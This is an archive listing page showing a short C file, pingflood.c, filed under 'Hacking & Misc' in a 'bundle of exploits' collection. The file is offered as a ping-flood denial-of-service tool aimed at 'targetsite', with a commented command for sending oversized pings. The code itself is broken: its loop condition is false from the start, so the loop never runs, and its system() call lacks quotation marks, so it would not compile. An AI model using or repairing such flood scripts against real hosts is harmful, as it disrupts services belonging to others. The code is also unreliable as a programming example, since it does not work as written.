home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / pingflood.c < prev    next >
C/C++ Source or Header  |  1998-07-17  |  148b  |  14 lines

  1. /* %ping -s 2000 targetsite &
  2.  
  3.  
  4.     OR  */
  5.  
  6. void main(){
  7.     int count=1;    
  8.     for(;count>10;count++){
  9.         system (ping -s 2000 targetsite);
  10.         sleep(3);
  11.     }
  12. }
  13.  
  14.